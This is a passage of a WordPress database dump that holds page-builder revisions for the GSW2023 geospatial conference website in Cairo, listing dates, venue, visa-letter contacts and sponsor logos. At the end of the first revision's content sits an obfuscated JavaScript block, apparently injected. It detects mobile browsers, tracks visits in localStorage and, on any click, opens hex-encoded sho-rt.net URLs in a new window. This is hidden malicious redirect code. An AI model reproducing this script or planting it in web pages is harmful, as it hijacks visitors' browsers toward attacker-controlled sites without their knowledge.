src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-19 21:49:11','2023-08-19 21:49:11','',3066,'https://gsw2023.com/?p=5342',0,'revision','',0),
(5343,1,'2023-08-19 21:52:15','2023-08-19 21:52:15','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]\r\n<h3 style=\"text-align: center;\"></h3>\r\n&nbsp;\r\n\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" 